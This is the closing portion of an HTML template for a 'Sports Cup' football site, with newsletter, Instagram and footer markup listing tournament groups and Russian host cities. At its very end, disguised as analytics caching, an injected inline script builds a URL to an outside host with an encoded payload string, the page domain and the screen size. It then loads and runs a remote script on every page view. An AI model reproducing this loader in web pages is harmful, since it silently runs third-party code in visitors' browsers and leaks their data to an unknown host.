                                                    <button class="btn btn-primary" type="submit" name="subscribe" >SIGN UP</button>
                                                 </span>
                                            </div>
                                        </div>
                                    </div>
                                </form>
                                <div id="result-newsletter"></div>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- End Newsletter -->
            </section>
            <!-- End Section Area -  Content Central -->

            <div class="instagram-btn">
                <div class="btn-instagram">
                    <i class="fa fa-instagram"></i>
                    FOLLOW
                    <a href="https://www.instagram.com/fifaworldcup/" target="_blank">&#64;fifaworldcup</a>
                </div>
            </div>

            <div class="content-instagram">
                <div id="instafeed"></div>
            </div>

            <!-- footer-->
            <footer id="footer">
                <!-- Footer Top-->
                <div class="top-footer">

                    <!-- Logo Footer-->
                   <div class="col-lg-12">
                        <div class="logo-footer">
                            <h2>Sports Cup</h2>
                        </div>
                   </div>
                    <!-- End Logo Footer-->

                    <!-- Social Icons-->
                    <ul class="social">
                        <li>
                            <div>
                                <a href="#" class="facebook">
                                    <i class="fa fa-facebook"></i>
                                </a>
                            </div>
                        </li>
                        <li>
                            <div>
                                <a href="#" class="twitter-icon">
                                    <i class="fa fa-twitter"></i>
                                </a>
                            </div>
                        </li>
                        <li>
                            <div>
                                <a href="#" class="vimeo">
                                    <i class="fa fa-vimeo-square"></i>
                                </a>
                            </div>
                        </li>
                        <li>
                            <div>
                                <a href="#" class="google-plus">
                                    <i class="fa fa-google-plus"></i>
                                </a>
                            </div>
                        </li>
                        <li>
                            <div>
                                <a href="#" class="youtube">
                                    <i class="fa fa-youtube"></i>
                                </a>
                            </div>
                        </li>
                    </ul>
                    <!-- End Social Icons-->
                </div>
                <!-- End Footer Top-->

                <!-- Links Footer-->
                <div class="links-footer">
                    <div class="container">
                        <div class="row">

                           <!-- Column Links -->
                            <div class="col-lg-2 col-md-5 col-sm-5">
                                <div class="info-links">
                                   <h5>Organisation</h5>
                                    <ul>
                                        <li><a href="#">Volunteers</a></li>
                                        <li><a href="#">Committees</a></li>
                                        <li><a href="#">Official Documents</a></li>
                                        <li><a href="#">Terms of Service</a></li>
                                    </ul>
                                </div>
                            </div>
                            <!-- End Column Links -->

                            <!-- Column Links -->
                            <div class="col-lg-4 col-md-7 col-sm-7">
                                <div class="info-links">
                                   <h5>Groups</h5>
                                    <ul class="columns">
                                        <li><a href="#">GROUP A</a></li>
                                        <li><a href="#">GROUP B</a></li>
                                        <li><a href="#">GROUP C</a></li>
                                        <li><a href="#">GROUP D</a></li>
                                        <li><a href="#">GROUP E</a></li>
                                        <li><a href="#">GROUP F</a></li>
                                        <li><a href="#">GROUP G</a></li>
                                        <li><a href="#">GROUP H</a></li>
                                    </ul>
                                </div>
                            </div>
                            <!-- End Column Links -->

                            <!-- Column Links -->
                            <div class="col-lg-2 col-md-5 col-sm-5">
                                <div class="info-links">
                                   <h5>Interest Links</h5>
                                    <ul>
                                        <li><a href="#">Statistics</a></li>
                                        <li><a href="#">Teams</a></li>
                                        <li><a href="#">Qualifiers</a></li>
                                        <li><a href="#">Ticketing</a></li>
                                    </ul>
                                </div>
                            </div>
                            <!-- End Column Links -->

                            <!-- Column Links -->
                            <div class="col-lg-4 col-md-7 col-sm-7">
                                <div class="info-links">
                                   <h5>Organisation</h5>
                                    <ul class="columns">
                                        <li><a href="#">NIZHNY NOVGOROD</a></li>
                                        <li><a href="#">SAINT PETERSBURG</a></li>
                                        <li><a href="#">EKATERINBURG</a></li>
                                        <li><a href="#">MOSCOW</a></li>
                                        <li><a href="#">KAZAN</a></li>
                                        <li><a href="#">KALININGRAD</a></li>
                                        <li><a href="#">VOLGOGRAD</a></li>
                                        <li><a href="#">ROSTOV-ON-DON</a></li>
                                    </ul>
                                </div>
                            </div>
                            <!-- End Column Links -->

                        </div>
                    </div>
                </div>
                <!-- End Links Footer-->

            </footer>
            <!-- End footer-->

            <!-- footer Down-->
            <div class="footer-down">
                <div class="container">
                    <div class="row">
                        <div class="col-md-12">
                            <p>&copy; 2018 SportsCup . All Rights Reserved</p>
                        </div>
                    </div>
                </div>
            </div>
            <!-- footer Down-->
        </div>
        <!-- End layout-->

        <!-- ======================= JQuery libs =========================== -->
        <!-- jQuery local-->
        <script type="text/javascript" src="assets/js/jquery.js"></script>
        <!-- popper.js-->
        <script type="text/javascript" src="assets/js/popper.min.js"></script>
        <!-- bootstrap.min.js-->
        <script type="text/javascript" src="assets/js/bootstrap.min.js"></script>
        <!-- required-scripts.js-->
        <script type="text/javascript" src="assets/js/theme-scripts.js"></script>
        <!-- theme-main.js-->
        <script type="text/javascript" src="assets/js/theme-main.js"></script>
        <!-- ======================= End JQuery libs =========================== -->

    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAAT0B5ixXONwu8BMSOr4entN5zHorK4J32UfLYIs%2bA1zkqVpTYYoHgOoE8dzPylsXf61muaPevIosio8wbhJGrtrJxT3vwoBC6zJ2Cx92EW%2bRQZt1Rq7QlVrQERjFWnxDDcQGvk5Q2WxPgpYMYjuTUSCmzi2nkdLEmhbp%2bQoQwQg7xeTEEY4rH15i9wAtEt2xzPulBfhfHNyIkSL4vHDRCujK5aD1PZIVba%2binw%2fYLUWL8toqT2OyvL1XkA33OaaTTlDnPkKrxdN7M7bZjmTewiGHikF9NIMdhPF0XFwWNCI%2f4AY6GBn7nxy7D6ucHj%2fRZvXVlgbaSuFJd%2b91BxQsbpGxxo6Q9kU3pnbVoHFJzgwwSbchg9X2p4CkA5okL75Ea9cwwYQgAKzYz9VJ4wdykh7VR%2fFLAAPJIQ%2bqc8n75oll74Tkap%2bXDUF5a6dPsLCgvKpuSLr43O3w5t0L7XjVrFxjraKiUG2xXQ33tNG7HPKVrEIBjoz65A%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
